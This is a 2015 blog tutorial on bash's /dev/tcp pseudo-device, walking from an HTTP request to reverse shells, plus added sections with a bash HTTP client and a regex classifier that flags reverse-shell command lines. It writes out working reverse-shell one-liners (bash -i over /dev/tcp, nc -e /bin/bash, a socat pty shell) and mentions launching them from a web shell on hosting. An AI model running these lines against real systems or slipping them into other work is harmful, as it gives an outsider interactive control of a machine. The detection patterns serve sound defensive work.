March 23, 2015 · fun linux bash

Reverse shells are fun

Need SSH access, but something is going wrong? Read on!

Sometimes I need a shell right now, but in some cases it's impossible (no SSH on the hosting, or something like that).
Happily, bash has built-in network pseudo-devices, /dev/tcp and /dev/udp (a compile-time option, enabled by default in most distro builds). So whatever we can already run on the server (PHP, Ruby, a web shell, etc.) can be used to launch bash, make a reverse connection from the server to our listener, and give us shell access.

/dev/tcp

To use it, we redirect from or to /dev/tcp/host/port as if it were a file; bash opens a TCP connection to host:port when the redirection is set up.
Simple example, reading from the NIST daytime service (TCP port 13):

user@host ~ $ cat < /dev/tcp/time.nist.gov/13

57103 15-03-22 23:54:14 50 0 0 587.5 UTC(NIST) * 

Send an HTTP request:

user@host ~ $ exec 3<> /dev/tcp/roundside.com/80  
user@host ~ $ echo -e "GET / HTTP/1.1\nHost: roundside.com\nConnection: close\n\n" >&3  
user@host ~ $ cat <&3  
HTTP/1.1 200 OK  
Server: nginx/1.6.1  
Date: Mon, 23 Mar 2015 00:06:00 GMT  
Content-Type: text/html  
Content-Length: 11517  
Connection: close  
Last-Modified: Tue, 09 Dec 2014 17:40:10 GMT  
ETag: "6587d2-2cfd-509cc08e7aef5"  
Accept-Ranges: bytes  
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
...

This one is a little different from the previous example. Because we need to send data before reading, we create file descriptor 3 for both reading and writing and bind it to /dev/tcp/address/port:

exec 3<> /dev/tcp/roundside.com/80  

A good article about bash redirections is the catonmat one listed in the refs below.
Next, build the HTTP request header and write it to file descriptor 3, which sends it over the connection (strictly, HTTP wants \r\n line endings; nginx accepts bare \n here, but use \r\n if a server rejects the request):

echo -e "GET / HTTP/1.1\nHost: roundside.com\nConnection: close\n\n" >&3  

And finally, read the response:

cat <&3  
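Putting the three steps together, as an added example that is not part of the original post: a small bash HTTP client built on /dev/tcp. It sends CRLF line endings, opens fd 3 inside a subshell so a failed connection (no network, or a bash built without /dev/tcp) cannot break the calling shell, and parses the response (status code, Content-Length, body size) in a separate function that can be exercised offline. Host, port and path are whatever the caller passes; nothing here is the author's code.

```bash
#!/bin/bash
# Added example, not from the original post: an HTTP GET over bash's /dev/tcp,
# split into a request builder, a response parser (testable offline) and the
# network step.

# Build a minimal HTTP/1.1 request. The spec wants CRLF line endings; most
# servers also accept bare \n, but CRLF is the safe choice.
http_request() {
    local host=$1 path=${2:-/}
    printf 'GET %s HTTP/1.1\r\nHost: %s\r\nConnection: close\r\n\r\n' "$path" "$host"
}

# Parse an HTTP response from stdin. Prints "<status> <content-length> <body-bytes>",
# with "-" for Content-Length when the header is missing. The trailing \r is
# stripped from each header line so CRLF and bare-LF servers parse the same.
parse_http_response() {
    local cr line code clen=- body_bytes
    cr=$(printf '\r')
    IFS= read -r line || return 1          # status line, e.g. "HTTP/1.1 200 OK"
    line=${line%"$cr"}
    set -- $line
    code=$2
    while IFS= read -r line; do            # headers end at the first empty line
        line=${line%"$cr"}
        [ -n "$line" ] || break
        case $line in
            [Cc]ontent-[Ll]ength:*) clen=$(printf '%s' "${line#*:}" | tr -d ' ') ;;
        esac
    done
    body_bytes=$(( $(wc -c) ))             # whatever is left on stdin is the body
    printf '%s %s %s\n' "$code" "$clen" "$body_bytes"
}

# Do the GET over /dev/tcp. The body runs in a subshell, so a failed open only
# kills the subshell and fd 3 is closed automatically on return. EOF comes from
# "Connection: close"; a server that keeps the connection open will block here.
http_get() (
    host=$1 port=${2:-80} path=${3:-/}
    exec 3<>"/dev/tcp/$host/$port" || exit 1
    http_request "$host" "$path" >&3
    parse_http_response <&3
)

# Example use (needs network): http_get roundside.com 80 /
```

Run parse_http_response on a saved response (for example, captured with cat <&3 > resp.txt) to check the parser without touching the network.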

Now, let's get bash over TCP
/dev/tcp can only make outgoing connections (it cannot listen), so netcat or socat is needed on the listener side. Create a listener (traditional netcat syntax; OpenBSD netcat takes nc -l 1413):

user@listener ~: nc -l -p 1413

And connect to it from target:

user@target ~ $ /bin/bash -c "/bin/bash -i > /dev/tcp/listener_address/1413 0>&1 2>&1"  

Done; now we have a remote shell using nothing but bash:

user@listener ~: nc -l -p 1413  
user@target ~ $ 

In this example bash runs in interactive mode,

/bin/bash -i

(bash will source ~/.bashrc or the default bash config file, so we get a slightly nicer shell with a prompt), sends all its stdout to the listener,

/bin/bash -i > /dev/tcp/listener_address/1413

and, because stdin is duplicated from stdout (0>&1), whatever the listener sends is read by bash as commands, with the results going back over the same socket. stderr is duplicated too (2>&1); this is important, because otherwise error messages and the prompt itself would land on the target's terminal instead of ours:

/bin/bash -i > /dev/tcp/listener_address/1413 0>&1 2>&1

More elegantly:

/bin/bash -c "bash -i &> /dev/tcp/listener_address/1413 0>&1"

&> or >& redirects both stdout and stderr to the specified file, here the socket.

Sure, netcat with the -e parameter can be used to execute bash, if the netcat on the target supports it (traditional netcat and ncat do; OpenBSD netcat has no -e):

user@target ~ $ nc listener_address 1413 -e '/bin/bash'  

But there is a problem.
Key shortcuts and ncurses-based programs will not work correctly, because the shell has no tty: it is talking to a plain socket, so there is no line editing, no job control, and Ctrl-C kills our local netcat instead of the remote command. We need a real pty now, and it's socat time!

Socat is like netcat, but with extremely powerful features (statically linked builds for Linux and FreeBSD exist and are convenient when the target has no package manager).
Create a listener:

user@listener ~: socat -,raw,echo=0 tcp-listen:1413  

And connect from target:

user@target ~ $ socat tcp:listener_address:1413 exec:"bash -i",pty,stderr,setsid,sigint,sane  

On the listener side, raw,echo=0 puts our own terminal into raw mode without local echo, so every keystroke goes straight to the remote pty. On the target side, pty allocates a pseudo-terminal for bash, stderr merges its stderr into the pty, setsid puts bash in its own session so the pty becomes its controlling terminal (a Ctrl-C byte arriving from the listener is then turned into SIGINT for bash's foreground job by the pty's line discipline), sigint additionally forwards SIGINT to bash if socat itself is interrupted, and sane resets the tty to sensible settings.
Now we can play ninvaders, use htop, mc, vim and any other CLI stuff :)
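The flip side, as an added example that is not part of the original post: a small classifier for the three reverse-shell shapes shown above (bash over /dev/tcp, nc -e, socat exec:) as they would appear in process command lines (auditd EXECVE records, ps output, EDR telemetry). The sample command lines are constructed for the demo; the label names and regexes are my own, not from any product.

```bash
#!/bin/bash
# Added example, not from the original post: flag reverse-shell-shaped
# command lines. The sample telemetry below is constructed.

# Classify one command line. Prints one label:
#   devtcp-shell  /dev/tcp or /dev/udp wired to a shell (bash -i, 0>&1, ...)
#   devtcp-io     /dev/tcp used without shell wiring (weaker signal; also
#                 matches legitimate bash-only health checks)
#   nc-exec       netcat/ncat asked to execute a program
#   socat-exec    socat connecting out and exec'ing a program
#   -             no match
classify_cmdline() {
    local cmd=$1
    if printf '%s\n' "$cmd" | grep -Eq '/dev/(tcp|udp)/[^ /]+/[0-9]+'; then
        if printf '%s\n' "$cmd" | grep -Eq '(bash|sh) +-i|0[<>]&[0-9]'; then
            echo devtcp-shell
        else
            echo devtcp-io
        fi
    elif printf '%s\n' "$cmd" | grep -Eq '(^|[ /])nc(at)? .*( -e | -c |--exec|--sh-exec)'; then
        echo nc-exec
    elif printf '%s\n' "$cmd" | grep -Eiq '(^|[ /])socat .*(tcp|udp|openssl)[^ ]*:.*exec:'; then
        echo socat-exec
    else
        printf '%s\n' -
    fi
}

# Run the classifier over command lines on stdin; print "label<TAB>cmdline"
# for everything that matched.
scan_cmdlines() {
    local cmd label
    while IFS= read -r cmd; do
        [ -n "$cmd" ] || continue
        label=$(classify_cmdline "$cmd")
        if [ "$label" != - ]; then
            printf '%s\t%s\n' "$label" "$cmd"
        fi
    done
}

# Constructed sample telemetry: three true positives, one bash-only /dev/tcp
# read that is only a weak signal, and two benign lines.
SAMPLE_CMDLINES='/bin/bash -c "/bin/bash -i > /dev/tcp/10.0.0.5/1413 0>&1 2>&1"
nc 10.0.0.5 1413 -e /bin/bash
socat tcp:10.0.0.5:1413 exec:"bash -i",pty,stderr,setsid,sigint,sane
nc -l -p 1413
cat < /dev/tcp/time.nist.gov/13
grep -r socat /etc'

printf '%s\n' "$SAMPLE_CMDLINES" | scan_cmdlines
```

Treat devtcp-io as an enrichment signal rather than an alert on its own: any bash script that probes a port with /dev/tcp will trip it, while the combination of /dev/tcp with bash -i or a 0>&1 stdin duplication is rarely legitimate.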

PS: don't forget to adjust the terminal size after getting the reverse bash; the remote pty knows nothing about our window.
See the actual size locally:

echo $LINES,$COLUMNS  
53,159

and export it on the remote side once we have the shell (ncurses programs honour LINES and COLUMNS; stty rows/cols on the remote pty is the alternative, and set TERM as well if it is empty):

export LINES=53;export COLUMNS=159  

All for now.

Want more?
The socat man page and its EXAMPLES file (linked in the refs below) cover many more address types and options.

Refs:
https://stuff.mit.edu/afs/sipb/machine/penguin-lust/src/socat-1.7.1.2/EXAMPLES
http://www.catonmat.net/blog/bash-one-liners-explained-part-three/
http://www.gnucitizen.org/blog/reverse-shell-with-bash/
http://blog.rootshell.ir/2010/08/get-your-interactive-reverse-shell-on-a-webhost/
